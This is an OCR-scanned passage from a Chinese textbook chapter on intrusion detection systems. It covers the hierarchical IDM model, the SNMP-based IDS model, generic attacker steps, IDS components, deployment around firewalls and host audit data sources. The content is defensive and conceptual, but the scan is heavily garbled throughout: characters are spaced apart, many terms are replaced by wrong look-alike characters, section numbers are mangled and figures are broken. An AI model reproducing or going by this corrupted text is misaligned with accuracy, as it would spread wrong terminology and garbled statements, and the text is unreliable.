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断 完 善 , 这 一 行为 会 最 终 被 纳入 到 攻击 的 江上 畴 中 。 事 实 上 , 误 用 检测 和 弄 第 检测 这 两 种 检 
测 思想 分 别 有 利 于 攻击 检测 和 入 侵 检 测 。 误 用 检测 通常 是 对 已 知 的 入 侵 方 法 进行 整理 并 
加 以 描述 ,再 和 网 络 中 的 数据 包 进 行 模式 匹配 ,从 而 得 出 最 后 的 结论 。 对 未 知人 侵 方法 的 
检测 则 主要 是 在 对 系统 正 凋 情况 分 析 的 基础 上 ,与 用 户 的 当前 行为 进行 比 对 ,从 而 得 出 续 
论 。 上 述 分 析 构 成 了 层次 化 入 侵 检测 模型 的 锥 形 。 

自 完 ,从 数据 源 的 角度 看 ,目前 的 入 侵 检测 系统 获取 数据 主要 来 源 于 网 络 数 据 源 和 主 
机 数据 源 。 其 次 ,从 检测 方法 来 说 ,主要 分 为 两 尖 : 误 用 检测 和 卉 第 检测 。 最 后 ,依据 检 
测 的 结 来 , 既 可 以 通过 对 攻击 行为 的 分 析 检 测 出 已 知 的 入 侵 种 类 ,又 可 以 通过 对 安全 生 略 
库 和 疑似 入 侵 的 行为 进行 模式 匹配 检测 出 未 知 的 人 侵 种 类 。 层 次 化 的 束 应 当 有 低层 和 融 
层 之 分 。 从 上 面 的 分 析 可 以 看 出 ,网 络 数据 源 的 格式 比较 单一 ,对 异 背 数据 包 的 定义 方法 
比较 击 单 ,对 数据 包 内 容 的 比较 方法 也 比较 简单 ,所 以 , 误 用 检测 吏 卓 然 成 为 层次 化 人 侵 
检测 中 最 基本 的 一 环 。 但 误 用 检测 也 有 检测 攻击 时 解决 不 了 的 问题 ,此 时 就 应 当 利用 一 
种 更 好 的 解决 方法 ,也 吉 是 利用 异 第 检测 处 理 这 一 环节 中 的 问题 。 上 面 两 种 检测 方法 的 
“两 面 夹击 ”, 可 以 将 大 部 分 的 攻击 行为 检测 出 来 并 拒 之 门 外 , 也 可 以 发 现 一 部 分 人 侵 行为 
并 采取 适当 的 补救 指 施 ,这样 处 理 不 了 的 遗留 问题 惑 会 大 大 减少 。 此 外 ,再 加 上 系统 管理 
员 的 参与 ,就 能 够 较 好 地 保护 系统 的 安全 。 层 次 化 人 侵 检 测 系统 的 结构 如 图 2-4 所 示 。 


| /攻击 特征 提取 本 本 加 
网 络 数据 源 } 攻击 信息 攻击 行为 分 析 检测 出 已 知人 侵 


攻击 特征 库 


主机 数据 源 ”入 侵 信 息 入 侵 行 为 分 析 检测 未 已 和 人 侵 


2-4 层次 化 人 侵 检测 系统 的 结构 


层次 化 人 侵 检 测 模型 将 入 侵 检 测 系 统 分 为 6 个 层次 ,从 低 到 融 依 次 为 : 数据 (Data) 
层 、 事 件 (Event) 层 .主体 (Subject) 层 、 上 下 文 (Context) 层 .威胁 (Thread) 层 和 安全 状态 
(Security State) 层 。 

IDM 模型 给 出 了 在 推断 网 络 中 的 计算 机 受 攻击 时 数据 的 抽象 过 程 。 也 就 是 说 ,人 它 给 
出 了 将 分 敌 的 原 怒 数据 转换 为 蜗 层 次 的 有 天 入 侵 和 被 检测 环境 的 安全 假设 过 程 。 通 过 把 
收集 到 的 分 敌 数 据 进行 加 工 抽象 和 数据 关联 操作 ,IDM 构造 了 一 侣 虚拟 的 网 络 环境 ,这 
侣 机 盏 由 所 有 相连 的 主机 和 网 络 组 成 。 将 分 布 式 系统 看 作 是 一 全 虚拟 的 计算 机 的 观点 简 
化 了 对 跨越 单机 的 入 侵 行为 的 识别 。IDM 也 应 用 在 只 有 单 台 计算 机 的 小 型 网 络 。IDM 6 
个 展 次 的 许 细 情况 如 下 。 
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1 第 一 层 : 数据 层 

数据 层 包 括 主 机 操作 系统 的 审计 记录 ,局域网 监视 融 结 末 和 第 三 方 审 计 软 件 包 提 供 
的 数据 。 在 该 层 中 ,刻画 客体 的 语法 和 语义 与 数据 来 源 是 关联 的 ,主机 或 网 络 上 的 所 有 操 
作 都 可 用 这 样 的 客体 表现 出 来 。 


2 第 二 层 : 事件 层 

该 层 处 理 的 客体 是 对 第 一 层 客体 的 补充 ,该 层 的 客体 称 为 事件 。 事件 描述 第 一 层 的 
客体 内 容 所 表示 的 含义 和 固有 的 特征 性 质 。 用 来 说 明 事 件 的 数据 域 有 两 个 , 即 动作 (Ac- 
tion) 和 领域 (Domain)。 动 作 刻 画 了 审计 记录 的 动态 特性 ,而 领域 给 出 了 审计 记录 对 象 的 
特征 。 很 多 情况 下 ,对 象 也 是 指 文件 或 设备 ,而 领域 要 根据 对 象 的 特征 或 其 所 在 文件 系统 
的 位 置 确定 。 由 于 进程 也 是 审计 记录 的 对 象 ,可 以 根据 进程 的 功能 将 其 归 到 某 个 领域 中 。 
事件 的 动作 包括 会 话 开始 、 会 话 结束 、 读 文件 或 设备 、 写 文件 或 设备 .进程 执行 .进程 结束 、 
创建 文件 或 设备 .删除 文件 或 设备 ,移动 文件 或 设备 .改变 权限 .改变 用 户 号 等 。 事件 的 领 
域 包括 标签 .认证 审计、 网络 .系统 .系统 信息 .用 户 信息 、 应 用 工具 拥有 者 和 非 拥有 


者 等 。 
3 第 三 层 : 主体 层 
主体 是 唯一 的 标识 号 ,用 来 鉴别 在 网 络 中 跨越 多 台 主 机 使 用 的 用 户 。 
4 第 四 层 : 上 下 文 层 


上 下 文 用 来 说 明 事 件 发 生 时 所 处 的 环境 ,或 者 给 出 事件 产生 的 背景 。 上 下 文 分 为 时 
间 型 和 空间 型 两 类 。 例 如 ,一 个 用 户 在 正常 工作 时 间 不 出 现 的 操作 在 下 班 时 出 现 , 则 这 个 
操作 很 值得 怀疑 ,这 就 是 时 间 上 下 文 的 例子 。 另 外 ,事件 发 生 的 时 间 顺 序 也 常用 来 检测 入 
侵 。 例 如 ,一 个 用 户 频繁 注册 失败 可 能 代表 入 侵 正在 发 生 。IDM 要 选取 某 个 时 间 点 为 参 
考点 ,然后 利用 相关 的 事件 信息 检测 入 侵 。 空 间 型 上 下 文 说 明了 事件 的 来 源 和 人 人 侵 行 为 
的 相关 性 ,事件 与 特别 的 用 户 或 者 一 台 主 机 相关 联 。 例 如 ,我 们 关心 一 个 用 户 从 低 安全 级 
别 计算 机 向 高 安全 级 别 计算 机 的 转移 操作 ,而 反方 向 的 操作 则 不 太 重 要 。 这 样 ,事件 上 下 
文 使 得 能 够 对 多 事件 进行 相关 性 入 侵 检 测 。 

5 第 五 层 : 威胁 层 

该 层 考 虑 事件 对 网 络 和 主机 构成 的 威胁 。 当 把 事件 及 其 上 下 文 结合 起 来 分 析 时 ,就 
能 发 现存 在 的 威胁 。 威 胁 类 型 可 以 根据 滥用 的 特征 和 对 象 进行 划分 。 也 就 是 说 ,入 侵 者 
做 了 什么 和 入 侵 对 象 是 什么 。 滥 用 分 为 攻击 、 误 用 和 可 疑 3 种 操作 。 攻 击 表明 机 需 的 状 
态 发 生 了 改变 , 误 用 则 表明 越权 行为 ,而 可 疑 只 是 入 侵 检测 感 兴趣 的 事件 ,不 与 安全 策略 
冲突 。 

滥用 的 目标 划分 为 系统 对 象 或 者 用 户 对 象 .被 动 对 象 或 者 主动 对 象 。 用 户 对 象 是 指 
没有 权限 的 用 户 或 者 是 用 户 对 象 存放 在 没有 权限 的 目录 。 系 统 对 象 则 是 用 户 对 象 的 补 
集 。 被 动 对 象 是 文件 ,而 主动 对 象 是 运行 的 程序 。 


6 第 六 层 : 安全 状态 层 
IDM 的 最 高 层 用 1~100 的 数字 值 表示 网 络 的 安全 状态 ,数字 越 大 ,网 络 的 安全 性 越 
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低 。 实 际 上 ,可 以 将 网 络 安全 的 数字 值 看 作 是 系统 中 所 有 主体 产生 威胁 的 函数 。 尽 管 这 
种 表示 系统 安全 状态 的 方法 会 丢失 部 分 信息 ,但 是 可 以 使 安全 管理 员 对 网 络 的 安全 状态 
有 一 个 整体 的 认识 。 在 DIDS( 决 策 信息 发 布 系 统 ) 中 实现 IDM 模型 时 ,使 用 一 个 内 部 数 
据 库 保存 各 个 层次 的 信息 ,安全 管理 员 可 以 根据 需要 查询 详细 的 相关 信息 。 

层次 化 人 侵 检 测 模型 导 通 用 入 侵 检 测 模型 相 比 ,具有 如 下 优 抒 : 

(1) 针对 不 同 的 数据 源 ,采用 了 不 同 的 特征 提取 方法 。Denning 的 通用 入 侵 检 测 模 
型 利用 一 个 事件 发 生 兹 处 理 全 部 的 审计 数据 和 网 络 数据 包 。 层 次 化 入 侵 检 测 模型 将 数据 
源 分 为 两 个 层次 ,来 用 不 同 的 特征 提取 和 行为 分 析 方 法 进行 处 理 , 提 高 了 检测 效率 和 可 
信和 度 ，。 

(2) 用 攻击 特征 库 和 安全 宋 略 库 取 代 活 动 记录 。 在 通用 人 侵 检 测 模 型 中 ,活动 记录 
中 保存 了 所 有 的 信息 ,这 样 昌 然 集中 ,但 是 为 检测 引擎 带 来 相当 大 的 麻烦 ,效率 很 低 。 而 
在 层次 化 和 人 侵 检 测 模 型 中 ,已 知 的 各 种 攻击 行为 都 被 存储 在 攻击 特征 库 中 ,而 处 理 未 知 入 
侵 行为 的 正 篆 行为 模式 和 安全 宋 略 则 被 存放 在 安全 策略 库 中 。 这 两 个 库 各 有 所 长 ,相互 
件 苑 。 

(3) 以 分 布 式 结构 取代 单一 结构 。 层 次 化 入 侵 检测 模型 可 以 很 方便 地 应 用 到 分 布 式 
和信 侵 检测 环境 中 ,可 以 实现 分 布 式 的 网 络 人 侵 检 测 。 


233 管理 式 入 侵 检 测 模 型 


随 独 网 络 技术 的 飞速 发 展 , 网 络 攻击 手段 越 来 越 复杂 ,攻击 者 大 都 是 通过 合作 方式 攻 
击 某 个 目标 系统 ,而 单独 的 IDS 难以 发 现 这 种 类 型 的 入 侵 行为 。 然 而 ,如 果 IDS 也 能 够 
像 攻击 者 那样 合作 ,就 有 可 能 检测 到 。 这 样 就 需要 一 种 公共 的 语言 和 统一 的 数据 表达 格 
式 ,能 够 让 IDS 之 间 顺 利 交 换 信息 , 从 而 实现 分 布 式 协同 检测 。 但 是 ,相关 事件 在 不 同 层 
eta 是 一 个 很 复杂 的 问题 。 基 于 这 样 的 因素 , 北 卡 罗 来 那州 立 大 学 的 Felix 

等 人 从 网 络 管理 的 角度 考虑 IDS 的 模型 ,提出 了 基于 SNMP 的 IDS 模型 ,简称 
SNMP-IDSM。 

SNMP-IDSM 以 SNMP 为 公共 语言 实现 IDS 之 间 的 消息 交换 和 协同 检测 , 它 定 义 了 
IDS-MIB ,使 得 原始 事件 和 抽象 事件 之 间 关 系 明 确 , 并 且 易 于 扩展 这 些 关 系 。SNMP- 
IDSM 的 工作 原理 如 图 2-5 所 示 。 在 该 图 中 ,IDS B 负责 监视 主机 B 和 请 求 最 新 的 IDS 囊 
件 ,主机 A 的 IDS A 观察 到 一 个 来 自主 机 B 的 攻击 企图 ,然后 IDS A 与 IDS B 联系 ,IDS 
B 啊 应 IDS A 的 请 求 ,IDS B 半 小 时 前 发 现 有 人 扫描 主机 B。 这 样 , 某 个 用 户 的 异常 活跃 
事件 被 IDS B 发 布 ,IDS A 怀疑 主机 B 受 到 了 攻击 。 为 了 验证 和 寻找 攻击 者 的 来 源 ,IDS 
A 使 用 MIB 脚本 发 送 一 些 代码 给 IDS B。 这 些 代 码 的 功能 类 似 于 “netstat,1sof” 等 ,它们 
能 够 搜集 主机 B 的 网 络 活 动 和 用 户 活 动 的 信息 。 最 后 ,这 些 代 码 的 执行 结果 表明 用 户 X 
在 某 个 时 刻 攻 击 主机 A。 而 且 ,IDS A 进一步 得 知 用 户 XX 来 自主 机 C。 这 样 ,IDS A 和 
IDS C 联系 ,要 求 主机 C 向 IDS A 报告 人 侵 事 件 。 

一 般 来 说 ,攻击 者 在 一 次 入 侵 过 程 中 通常 会 采用 以 下 一 些 步骤 。 

(1) 使 用 端口 扫描、 操作 系统 检测 或 者 其 他 黑客 工作 收集 目标 有 关 信 息 。 

(2) 寻找 系统 的 漏洞 并 且 利 用 这 些 漏洞 ,如 Sendmail 的 错误 .匿名 FTP 的 错误 配置 
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问 脚 本 MIB 实 施 SNMP Set 操 作 


SNMP 通知 


图 2-5 SNMP-IDSM 的 工作 原理 


或 者 X 服务 融 授 权 给 任何 人 访问 。 一 些 攻击 企图 失败 而 被 记录 下 来 ,另外 一 些 攻击 企图 
则 可 能 成 功 实 施 。 

(3) 如 果 攻 击 成 功 , 人 侵 者 就 会 清除 日 志 信息 或 者 隐藏 自己 而 不 被 其 他 人 观察 到 。 

(4) 安装 后 门 , 如 Rootkit 木马 或 者 网 络 嗅 探 器 等 。 

(5) 使 用 已 攻破 的 系统 作为 跳板 入侵 其 他 主机 。 例 如 ,用 守 听 口令 攻击 相 邻 的 主机 
或 者 搜索 主机 间 的 非 安全 信任 关系 等 。 

SNMP-IDSM 根据 上 述 的 攻击 原理 ,采用 五 元 组 形式 描述 攻击 事件 。 该 五 元 组 的 格 
式 为 二 WHRER, WHEN, WHO, WHAT, HOW 二 。 其 中 各 个 字段 的 含义 如 下 。 

QD WHRER: 描述 产生 攻击 的 位 置 ,包括 目标 所 在 地 以 及 在 什么 地 方 观察 到 事件 
发 生 。 

WHEN: 事件 的 时 间 戳 ,用 来 说 明 事 件 的 起 始 时 间 、 终 止 时 间 、 信 息 频 度 或 发 生 
次 数 。 

WHO: 表明 IDS 观察 到 的 事件 ,如 果 可 能 ,记录 哪个 用 户 或 进程 触发 事件 。 

WHAT: 记录 话 细 信 息 , 如 协议 类 型 .协议 说 明 数 据 和 包 的 内 容 。 

HOW: 用 来 连接 原始 事件 和 抽象 事件 。 

SNMP-IDSM 定义 了 用 来 描述 入 侵 事 件 的 管理 信息 库 (MIB), 并 将 入 侵 事 件 分 为 原 
始 事 件 (Raw Event) 和 抽象 事件 (Abstract Event) 两 层 结构 。 原 始 事件 指 的 是 引起 安全 
状态 迁移 的 事件 或 者 是 表示 单个 变量 偶 移 的 事件 ,而 抽象 事件 是 指 分 析 原 始 事件 所 产生 
的 事件 。 原 始 事件 和 抽象 事件 的 信息 都 用 四 元 组 二 WHERE，WHEN，WHO，WHAT> 
描述 。 


2.4 ”入 侵 检测 系统 的 工作 模式 


通用 的 入 侵 检测 系统 的 基本 结构 包括 事件 产生 器 ,事件 分 析 器 .事件 数据 库 和 响应 
单元 。 
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1 事件 产生 希 

事件 产生 带 负 责 原 始 数据 收集 ,并 将 收集 到 的 原始 数据 转换 成 事件 , 回 系统 的 其 他 部 分 
提供 此 事件 。 收 集 的 信息 包括 : 系统 或 网 络 的 日 志文 件 . 网 络 流量 .系统 目录 和 文件 的 异 稼 
变化 ,程序 执行 中 的 异常 行为 。 入 侵 检 测 很 大 程度 上 依赖 于 收集 信息 的 可 菲 性 和 正确 性 。 


2 事件 分 析 器 

事件 分 析 器 接收 事件 信息 ,并 对 其 进行 分 析 , 判 断 是 否 为 人 侵 行为 或 异常 现象 ,最 后 
将 判断 的 结果 转变 为 告警 信息 。 分 析 方法 有 如 下 3 种 。 

(1) 模式 匹配 , 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 和 系统 误 用 模式 数据 库 进行 比 
较 , 从 而 发 现 违背 安全 策略 的 行为 。 

(2) 统计 分 析 : 首先 给 系统 对 象 ( 如 文件 .用 户 、 目 录 和 设备 等 ) 创 建 一 个 统计 描述 ， 
统计 正常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 .操作 失 败 次 数 和 延 时 等 ) ;测量 属性 的 平均 
值 和 偏差 将 被 用 来 与 网 络 \ 系 统 的 行为 进行 比较 ,观察 值 在 正常 范围 外 时 ,就 认为 有 和 人 侵 
发 生 。 

(3) 完整 性 分 析 ( 往 往 用 于 事后 分 析 ): 主要 关注 某 个 文件 或 对 象 是 否 被 更 改 。 


3 事件 数据 库 
事件 数据 库 是 存放 各 种 中 间 数 据 和 最 终 数据 的 地 方 。 


4 啊 应 单元 

根据 告 党 信息 做 出 反应 ,如 强烈 反应 (切断 连接 改变 文件 属性 等 ) 简单 的 警报 等 。 

无 论 对 于 什么 类 型 的 入 侵 检测 系统 ,其 工作 模式 都 可 以 体现 为 以 下 4 个 步骤 。 

(1) 从 系统 的 不 同 环 区 收集 信息 。 

(2) 分 析 该 信息 ,试图 寻找 入 侵 活动 的 特征 。 

(3) 日 动 对 检测 到 的 行为 进行 啊 应 。 

(4) 记录 并 且 报 告 检测 过 程 和 结 来 。 

一 个 典型 的 和 人 侵 检测 系统 从 功能 上 可 分 为 3 个 组 成 部 分 : 感应 带 (Sensor) 分析 带 
(Analyzer) 和 管理 各 (Manager), 见 表 2-1。 


表 2-1 入 侵 检 测 系统 的 功能 结构 
管理 者 (Manager) 
分 析 器 (Analyzer) 
感应 器 (Sensor) 


网 络 应 用 程序 


其 中 ,感应 需 负 责 收 集 信 息 。 其 信息 源 可 以 是 系统 中 可 能 包含 人 侵 细 节 的 任何 部 分 ， 
其 中 比较 典型 的 信息 源 有 网 络 数 据 包 、log 文件 和 系统 凋 用 的 记录 等 。 感 应 般 收 集 这 些 
信息 并 且 将 其 发 送 给 分 析 估 。 

分 析 带 从 许多 感应 带 接收 信息 ,并 对 这 些 信息 进行 分 析 , 以 决定 是 否 有 入 侵 行 为 发 
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生 。 如 果 有 和信 侵 行为 发 生 ,分 析 虎 将 提供 关于 人 侵 的 具体 细节 ,并 提供 可 能 采取 的 对 策 。 
一 个 入 侵 检测 系统 通常 可 以 对 检测 到 的 入 侵 行为 采取 相应 的 按 施 进行 反击 。 例 如 ,在 防 
火 墙 处 丢弃 可 疑 的 数据 包 , 当 用 户 表现 出 不 正常 行为 时 ,拒绝 其 进行 访问 ,以 及 向 其 他 同 
时 受到 攻击 的 主机 发 出 上 雹 报 等 。 

定理 各 通常 也 馈 称 为 用 尸 控 制 台 , 它 以 一 种 可 视 的 方式 站 用 尸 近 供 收 集 到 的 各 种 数 
据 及 相应 的 分 析 结 采 ,用户 可 以 通过 管理 天 对 人 侵 检 测 系统 进行 配置 , 设 定 各 种 系统 的 参 
数 , 从 而 对 入 侵 行为 进行 检测 以 及 对 相应 措施 进行 管理 。 


35 ”入侵 检测 系统 的 部 署 


对 于 入 侵 检测 系统 来 说 ,其 类 型 不 同 、 应 用 环境 不 同 ,部 署 方案 也 会 有 所 差别 。 对 于 
基于 主机 的 入 侵 检 测 系统 来 说 , 它 一 般 应 用 在 保护 关键 主机 或 服务 器 ,因此 ,只 要 将 它 部 
署 到 这 些 关键 主机 或 服务 器 中 即 可 。 但 是 ,对 于 基于 网 络 的 入 侵 检测 系统 来 说 ,根据 网 络 
环境 的 不 同 , 其 部 署 方案 也 会 有 所 不 同 , 各 种 网 络 环境 千差万别 ,在 此 无 法 一 一 袭 述 。 因 
此 ,本 节 中 只 考虑 两 种 环境 的 网 络 环境 , 即 网 络 中 没有 部 署 防火 墙 时 的 情况 和 网 络 中 部 团 
防火 墙 时 的 情况 ， 


1 网 络 中 没有 部 署 防火 墙 时 

通 当 ,在 网 络 中 考 上 不安 全 防护 方 条 时 ,首先 考虑 的 是 在 网 络 的 入 口 处 安 裕 防火 墙 进 行 
过 滤 。 但 是 ,在 有 些 环境 中 ,由 于 茶 种 原因 可 能 无 法 部 闭 防 火 寺 。 

在 没有 安 痿 防火 墙 的 情况 下 ,网 络 人 侵 检测 系统 通 背 安 次 在 网 络 人 口 处 的 交换 机 上 ， 
以 便 监 听 所 有 进出 网 络 的 数据 包 并 进行 相应 的 你 护 , 如 图 2-6 所 示 。 在 交换 机 环境 下 ,为 
了 监听 所 有 数据 包 , 通 常 利 用 交换 机 的 端口 镜像 功能 。 具 体 的 镜像 配置 方法 各 交换 机 三 
商人 存在 一 些 差 区 ,需要 办 交换 机 三 商 或 者 经 销 商 咨询 。 


A ea oo 
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2-6 ”没有 部 署 防火 墙 时 入 侵 检测 系统 的 部 署 情况 


52 


第 2 章 入 侵 检测 


市 面 上 的 4 层 交 换 机 除了 具有 闯 口 镜像 功能 外 ,还 提供 QoSs .负载 平衡 等 功能 ,部 分 
提供 商 的 产品 提供 防御 部 分 DoS( 拒 绝 服务 ) 攻 击 的 能 力 , 所 以 有 利于 提高 整体 的 安全 性 。 

2 网 络 中 部 署 防 火场 时 

防护 墙 系统 具有 防御 外 部 网 络 攻 击 的 作用 ,网 络 中 部 署 防火 墙 时 和 入 侵 检测 系统 互 
相配 合 可 以 进行 更 有 效 的 安全 管理 。 

在 这 种 情况 下 ,通常 将 人 侵 检 测 系 统 部 音 在 防火 墙 之 后 ,进行 继 防 火 墙 一 次 过 滤 之 后 
的 二 次 防 爷 。 入 侵 检测 系统 部 普 在 防火 墙 内 部 如 图 2-7 所 示 。 


黑客 一 一 lnternet 


防火 墙 -一 一 路 由 器 


| Sensor DMZ 网 络 


“| 


管理 员 


DNS | Mail | 
图 2-7 入 侵 检 测 系 统 部 署 在 防火 墙 内 部 


但 是 ,有 些 情况 下 还 需要 考虑 来 自 外 部 的 针对 防火 墙 本 身 的 攻击 行为 。 如 果 黑 客 
觉察 到 防火 墙 的 存在 并 攻破 防火 墙 ,对 内 部 网 络 是 十 分 危险 的 。 因 此 ,在 高 安全 性 要 
求 的 环境 下 在 防火 墙 外 部 部 署 入 侵 检测 产品 ,进行 先 于 防火 墙 的 一 次 检测 、 防 御 。 这 
样 ,用 户 可 以 预知 恶意 攻击 防火 墙 的 行为 并 及 时 采取 相应 的 安全 措施 ,以 保证 整个 网 
络 安全 ， 


96 ”入侵 检测 过 程 


入 侵 检测 涉及 很 多 技术 的 应 用 ,而 且 目 前 这 些 技术 还 在 不 断 发 展 中 。 本 市 主要 介绍 
入 侵 检 测 的 流程 ,包括 入侵 检测 过 程 中 各 个 阶段 涉及 的 一 些 关 键 拉 术 。 

总 的 来 说 ,入侵 检测 的 过 程 可 以 分 为 3 个 阶段 : 信息 收集 阶段 ,信息 分 析 阶 段 以 及 告 
索 己 啊 应 阶段 。 和 信 侵 检测 过 程 的 流程 如 图 2-8 所 示 。 


261 信息 收集 


入 侵 检测 的 第 一 步 是 信息 收集 , 即 从 入 侵 检 测 系 统 的 信息 源 中 收集 信息 ,收集 信息 的 
内 容 包括 系统 、 网 络 ,数据 以 及 用 户 活动 的 状态 和 行为 等 。 而 且 , 需 要 在 计算 机 网 络 系统 
D3 
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中 的 知 干 不 同 关键 点 (不 同 网 段 和 不 同 主机 ) 收 集 信息 。 信 息 收 集 
的 范围 越 广 , 和 人 侵 检 测 系 统 的 检测 范围 越 大 。 此 外 ,从 一 个 源 收集 
到 的 信息 有 可 能 看 不 出 疑点 ,但 从 几 个 源 收 集 到 的 信息 的 不 一 致 

性 却 可 能 是 可 疑 行为 或 入 侵 的 最 好 标志 。 
当然 ,入 侵 检 测 很 大 程度 上 依赖 于 所 收集 信息 的 可 靠 性 和 正 
确 性 ,因此 ,很 有 必要 利用 知道 的 精确 软件 报告 这 些 信息 。 因 为 黑 
客 经 稼 替换 软件 ,以 混 消 和 移 走 这 些 信息 ,例如 ,替换 被 程序 调用 
的 子 程序 、 库 和 其 他 工具 。 黑 客 对 系统 的 修改 可 能 使 系统 功能 失 
常 并 看 起 来 与 正常 时 一 样 ,而 实际 上 却 并 非 如 此 。 例 如 ,UNIX 系 
统 的 ps 指令 可 以 被 替换 为 一 个 不 显示 侵入 过 程 的 指令 ,或 者 是 编 
2-8 人 入 侵 检测 过 程 ” 辑 器 被 蔡 换 成 一 个 读 取 不 同 于 指定 文件 的 文件 , 即 黑客 隐藏 了 初 
的 流程 始 文件 并 用 另 一 个 版 本 符 换 。 这 需要 保证 用 来 检测 网 络 系统 的 软 
件 的 完整 性 ,特别 是 入 侵 检 测 系 统 ,软件 本 号 应 具有 相当 强 的 坚固 

性 ,防止 被 算 改 而 收集 到 错误 信息 。 


262 信息 分 析 


入 侵 检测 系统 从 信息 源 中 收集 到 的 有 关系 统 、 网 络 ,数据 及 用 户 活 动 的 状态 和 行为 等 
信息 ,其 信息 量 非常 硕大 ,在 这 些 海量 信息 中 , 绝 大 部 分 信息 部 是 正常 信息 ,只 有 很 少 一 部 
分 全 县 才 可 能 代表 春 入 侵 行为 的 发 生 , 那 么 ,如 何 从 大 量 的 信息 中 找到 表征 入 侵 行为 的 异 
稼 信息 ,这 就 需要 对 这 些 信息 进行 分 机 。 可 见 , 信 息 分 析 是 入 侵 检测 行为 过 程 中 的 核心 环 
节 , 没 有 信息 分 析 功 能 ,入 侵 检 测 也 就 无 从 谈 起 。 

入 侵 检 测 系统 是 一 个 复杂 的 数据 处 理 系 统 , 所 涉及 的 问题 成 中 的 各 种 关系 也 比较 复 
杂 。 从 入 侵 检 测 的 角度 来 说, 分 析 是 指针 对 用 户 和 系统 活动 数据 进行 有 效 的 组 织 . 整 理 并 
提取 特征 ,以 鉴别 感 兴趣 的 行为 。 这 种 行为 的 鉴别 可 以 实时 进行 ,也 可 以 事后 分 析 , 在 很 
多 情况 下 ,事后 的 进一步 分 析 征 为 了 寻找 行为 的 负责 人 。 人 入 侵 分 析 的 目的 主要 分 为 三 氮 : 
威慑 力 、 安 全 规划 和 管理 以 及 获取 入 侵 证 据 。 

入 侵 检 测 的 信息 分 析 方 法 有 很 多 ,如 模式 匹配 、 统 计 分 析 、 完 整 性 分 析 等 。 每 种 方法 
各 有 各 日 的 优 缺 点, 也 虱 有 其 各 目的 应 对 对 象 和 施 围 。 


263 ”告警 与 响应 


当 一 个 攻击 企图 或 事件 被 检测 到 后 ,入 侵 检 测 系 统 束 应 该 根据 攻击 或 事件 的 类 型 或 
性 质 做 出 相应 的 香 警 与 啊 应 , 即 通知 管理 员 系 统 正 在 遭受 不 民 行 为 的 人 侵 , 或 者 采取 一 秆 
的 措施 阻止 人 侵 行 为 的 继续 。 篆 见 的 告警 与 啊 应 方式 如 下 。 

(1) 自动 终止 攻击 。 

(2) 终止 用 户 连接 。 

(3) 禁止 用 户 账 号 。 

(4) 重新 配置 防火 场 ,阻塞 攻击 的 源 地 址 。 

(5) 回 管 理 控制 台 发 出 警告 ,指出 事件 的 发 生 。 
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(6) 问 网 络 管 理 平 台 发 出 SNMP Trap。 

(7) 记录 事件 的 日 志 , 含 日 期 .时间 、 源 地 址 .目的 地 址 . 摘 述 与 事件 相关 的 原始 数据 。 
(8) 问安 全 管理 人 员 发 出 提示 性 的 电子 邮件 。 

(9) 执行 一 个 用 户 目 定义 程序 。 


37 入 侵 检测 系统 的 信息 收集 


271 基于 主机 数据 源 

审计 数据 是 收集 一 个 给 定 机 器 用 户 活动 信息 的 唯一 方法 。 但 是 , 当 系统 受到 攻击 时 ， 
系统 的 审计 数据 很 有 可 能 被 修改 。 这 就 要 求 基于 主机 的 人 侵 检测 系统 必须 满足 一 个 重要 
的 实时 性 条 件 : 检测 者 必须 在 攻击 者 接管 并 暗中 破坏 系统 审计 数据 或 人 侵 检 测 系统 之 前 
完成 对 审计 数据 的 分 析 , 产 生 报 警 并 采取 相应 措施 。 


1 系统 的 运行 状态 信息 


所 有 的 操作 系统 都 捉 供 一 些 系 统 命 令 获 取 系 统 的 运行 情况 。 在 UNIX 环境 中 ,这 类 
他 令 有 ps、pstat、vmstat、gertlimit 罕 。 这 些 命令 直接 检查 系统 内 核 的 存储 区 ,所 以 它们 


能 够 提供 相当 准确 的 关于 系统 事件 的 关键 信息 。 但 是 ,由 于 这 些 命令 不 能 以 结构 化 的 方 
式 收集 或 存储 对 应 的 审计 信息 ,所 以 很 难 满足 和信 侵 检测 系统 需要 连续 进行 审计 数据 收集 


2 系统 的 记 账 信息 

记 账 (Accounting) 是 获取 系统 行为 信息 最 古老 . 普 过 的 方法 。 网 络 设备 .主机 系统 以 
及 UNIX 工作 站 中 部 使 用 了 记 账 系统 ,用 于 提供 系统 用 户 使 用 共 至 资源 (如 处 理 机 时 间 、 
内 存 、 磁 盘 或 网 络 的 使 用 等 ) 的 信息 ,以 便 回 用 户 收 费 。 记 上 账 系 统 的 广泛 应 用 使 得 在 设计 
入 侵 检 测 原 型 时 可 以 有 来 用 它 作 为 系统 审计 数据 源 。 


3 系统 日 志 

Syslog 是 操作 系统 为 系统 应 用 提供 的 一 项 审计 服务 ,这 项 服务 在 系统 应 用 提供 的 文 
本 串 形式 的 信息 前 面 添加 应 用 运行 的 系统 名 和 时 间 戳 信息 ,然后 进行 本 地 或 远程 归档 处 
理 。 但 是 Syslog 并 不 安全 ,因为 据 CERT 的 报告 ,一些 UNIX 的 Syslog 守护 程序 极 易 遭 
受 绥 冲 区 洲 出 性 攻击 。 不 过 ,Syslog 很 容 多 使 用 ,如 login、Sendmail、NFS、HTTP 等 系统 
应 用 和 网 络 服务 ,还 有 安全 类 工具 (如 sudo、klaxon 以 及 TCP wrappers 等 ) 都 使 用 它 作 为 
自身 的 审计 记录 。 但 只 有 少数 入 侵 检 测 系统 采用 Syslog 守护 程序 提供 的 信息 。 


4 品级 安全 审计 信息 
系统 的 安全 审计 记录 了 系统 中 所 有 次 在 的 安全 相关 事件 的 信息 。 在 UNIX 系统 中 ， 
审计 系统 记录 了 用 户 局 动 的 所 有 进程 执行 的 系统 调用 序列 。 和 一 个 完整 的 系统 调用 序列 
比较 ,审计 记录 则 将 其 进行 了 有 限 的 抽象 ,其 中 没有 出 现 上 下 文 切换 、 内 存 分 配 、 内 部 信和 号 
量 以 及 连 疆 的 文件 的 系统 调用 序列 。 这 也 是 一 个 把 审计 时 间 映 射 为 系统 调用 序列 的 下 接 
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方法 。UNIX 的 安全 记录 中 包含 了 大 量 关 于 事件 的 信息 : 用 于 识别 用 户 、 组 的 详细 信息 
(登录 号 份 ,用户 相关 的 程序 调用 ) ,系统 调用 执行 的 参数 (包括 路 径 的 文件 名 、 命 令 行 参数 
等 ) 以 及 系统 程序 执行 的 返回 值 .错误 码 等 。 

